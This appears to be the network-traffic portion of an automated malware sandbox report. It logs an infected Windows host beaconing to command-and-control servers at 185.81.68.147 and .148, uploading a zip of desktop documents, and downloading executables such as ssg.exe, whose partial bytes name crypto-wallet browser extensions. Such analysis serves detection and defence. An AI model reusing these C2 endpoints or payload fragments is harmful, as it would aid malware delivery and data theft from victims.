Dec 13, 2024 01:37:47.205480099 CET	1236	IN	Data Raw: 45 33 c9 4c 8d 05 ef fe ff ff 33 d2 33 c9 ff 15 b1 42 00 00 48 89 44 24 38 ba ff ff ff ff 48 8b 4c 24 38 ff 15 94 42 00 00 32 c0 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 33 c0 83 f8 01 0f 84 e1 00 00 00 c7 44 24 20 00 Data Ascii: E3L33BHD$8HL$8B2HHHL$H83D$ D%CLZEH.ChH-?HH?HH'2HC2HO2Hc2Hw2H2H2
Dec 13, 2024 01:37:47.325773001 CET	1236	IN	Data Raw: 15 44 3c 00 00 e8 fb fc ff ff 33 c0 83 f8 01 74 0d b9 50 c3 00 00 ff 15 dd 3b 00 00 eb ec 33 c9 ff 15 23 3c 00 00 e9 34 01 00 00 e8 cd 04 00 00 88 84 24 50 02 00 00 e8 39 fe ff ff 0f b6 c0 85 c0 74 54 48 8b 0d 77 3a 00 00 e8 de 0d 00 00 0f b6 c0 Data Ascii: D<3tP;3#<4$P9tTHw:uH4/t3;3tPq;3;HD$(D$ E3Lc335=H$`HD$(D$ E3LV33=H$XH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49817	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:46.140810966 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:46.260632992 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:47.742752075 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49823	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:47.970453024 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:48.090342045 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:49.619559050 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49824	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:48.605655909 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:37:49.911746979 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49825	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:49.855276108 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:49.975013018 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:51.502438068 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:50 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49831	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:50.482773066 CET	184	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 32 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 38 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000820101&unit=246122658369
Dec 13, 2024 01:37:51.819567919 CET	201	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e Data Ascii: <c>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49832	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:51.596510887 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:37:52.947635889 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49833	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:51.734390974 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:51.854331970 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:53.362261057 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49839	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:53.455741882 CET	137	OUT	GET /update.exe HTTP/1.1 Host: 185.81.68.147 If-Modified-Since: Thu, 12 Dec 2024 05:53:20 GMT If-None-Match: "4b400-6290c54e671ba"
Dec 13, 2024 01:37:54.789036036 CET	219	IN	HTTP/1.1 304 Not Modified Date: Fri, 13 Dec 2024 08:37:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 05:53:20 GMT ETag: "4b400-6290c54e671ba" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49840	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:53.593900919 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:53.713783026 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:55.316325903 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49841	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:54.840452909 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:37:56.162066936 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49847	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:55.547332048 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:55.667208910 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:56.985291958 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49849	185.81.68.147	80	2164	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:56.935749054 CET	169	OUT	POST /7vhfjke3/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxOA== Host: 185.81.68.147 Content-Length: 4778 Cache-Control: no-cache
Dec 13, 2024 01:37:56.935823917 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 01:37:56.935889006 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 01:37:56.935919046 CET	8	OUT	Data Raw: 08 00 1c 52 44 57 19 a3 Data Ascii: RDW
Dec 13, 2024 01:37:56.935941935 CET	8	OUT	Data Raw: 19 73 86 02 00 00 02 04 Data Ascii: s
Dec 13, 2024 01:37:56.935966969 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 01:37:56.935992956 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 42 4a Data Ascii: iles_\BJ
Dec 13, 2024 01:37:56.936017990 CET	8	OUT	Data Raw: 5a 46 50 50 57 41 50 54 Data Ascii: ZFPPWAPT
Dec 13, 2024 01:37:56.936038017 CET	8	OUT	Data Raw: 2e 64 6f 63 78 15 93 49 Data Ascii: .docxI
Dec 13, 2024 01:37:56.936065912 CET	8	OUT	Data Raw: 8e 40 21 08 44 f7 9d f4 Data Ascii: @!D
Dec 13, 2024 01:37:56.936084986 CET	8	OUT	Data Raw: a1 10 bf 38 82 f3 74 ff Data Ascii: 8t
Dec 13, 2024 01:37:58.569766045 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49856	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:57.278350115 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:57.399631023 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:58.868114948 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49855	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:57.282783031 CET	184	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 32 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 38 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000830101&unit=246122658369
Dec 13, 2024 01:37:58.538021088 CET	201	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e Data Ascii: <c>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49857	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:57.799662113 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:37:59.164083004 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49858	185.81.68.147	80	6664	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:57.892007113 CET	169	OUT	POST /7vhfjke3/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxOA== Host: 185.81.68.147 Content-Length: 4778 Cache-Control: no-cache
Dec 13, 2024 01:37:57.892091990 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 01:37:57.892152071 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 01:37:57.892184973 CET	8	OUT	Data Raw: 08 00 1c 52 44 57 19 a3 Data Ascii: RDW
Dec 13, 2024 01:37:57.892205954 CET	8	OUT	Data Raw: 19 73 86 02 00 00 02 04 Data Ascii: s
Dec 13, 2024 01:37:57.892225981 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 01:37:57.892242908 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 42 4a Data Ascii: iles_\BJ
Dec 13, 2024 01:37:57.892272949 CET	8	OUT	Data Raw: 5a 46 50 50 57 41 50 54 Data Ascii: ZFPPWAPT
Dec 13, 2024 01:37:57.892307997 CET	8	OUT	Data Raw: 2e 64 6f 63 78 15 93 49 Data Ascii: .docxI
Dec 13, 2024 01:37:57.892307997 CET	8	OUT	Data Raw: 8e 40 21 08 44 f7 9d f4 Data Ascii: @!D
Dec 13, 2024 01:37:57.892339945 CET	8	OUT	Data Raw: a1 10 bf 38 82 f3 74 ff Data Ascii: 8t
Dec 13, 2024 01:37:59.630598068 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49859	185.81.68.148	80	2164	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:58.704850912 CET	172	OUT	POST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxOA== Host: 185.81.68.148 Content-Length: 4778 Cache-Control: no-cache
Dec 13, 2024 01:37:58.704927921 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 01:37:58.704972029 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 01:37:58.704997063 CET	8	OUT	Data Raw: 08 00 1c 52 44 57 19 a3 Data Ascii: RDW
Dec 13, 2024 01:37:58.705027103 CET	8	OUT	Data Raw: 19 73 86 02 00 00 02 04 Data Ascii: s
Dec 13, 2024 01:37:58.705039024 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 01:37:58.705065966 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 42 4a Data Ascii: iles_\BJ
Dec 13, 2024 01:37:58.705082893 CET	8	OUT	Data Raw: 5a 46 50 50 57 41 50 54 Data Ascii: ZFPPWAPT
Dec 13, 2024 01:37:58.705112934 CET	8	OUT	Data Raw: 2e 64 6f 63 78 15 93 49 Data Ascii: .docxI
Dec 13, 2024 01:37:58.705130100 CET	8	OUT	Data Raw: 8e 40 21 08 44 f7 9d f4 Data Ascii: @!D
Dec 13, 2024 01:37:58.705153942 CET	8	OUT	Data Raw: a1 10 bf 38 82 f3 74 ff Data Ascii: 8t
Dec 13, 2024 01:38:00.232743025 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49860	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:59.094075918 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:59.214122057 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:00.550354004 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49866	185.81.68.148	80	6664	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:59.756328106 CET	172	OUT	POST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxOA== Host: 185.81.68.148 Content-Length: 4778 Cache-Control: no-cache
Dec 13, 2024 01:37:59.756423950 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 01:37:59.756469965 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 01:37:59.756499052 CET	8	OUT	Data Raw: 08 00 1c 52 44 57 19 a3 Data Ascii: RDW
Dec 13, 2024 01:37:59.756517887 CET	8	OUT	Data Raw: 19 73 86 02 00 00 02 04 Data Ascii: s
Dec 13, 2024 01:37:59.756537914 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 01:37:59.756556988 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 42 4a Data Ascii: iles_\BJ
Dec 13, 2024 01:37:59.756573915 CET	8	OUT	Data Raw: 5a 46 50 50 57 41 50 54 Data Ascii: ZFPPWAPT
Dec 13, 2024 01:37:59.756603003 CET	8	OUT	Data Raw: 2e 64 6f 63 78 15 93 49 Data Ascii: .docxI
Dec 13, 2024 01:37:59.756623030 CET	8	OUT	Data Raw: 8e 40 21 08 44 f7 9d f4 Data Ascii: @!D
Dec 13, 2024 01:37:59.756640911 CET	8	OUT	Data Raw: a1 10 bf 38 82 f3 74 ff Data Ascii: 8t
Dec 13, 2024 01:38:01.281836033 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49867	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:00.200416088 CET	46	OUT	GET /ssg.exe HTTP/1.1 Host: 185.81.68.147
Dec 13, 2024 01:38:01.525239944 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT ETag: "4b200-629107cd804d2" Accept-Ranges: bytes Content-Length: 307712 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5r
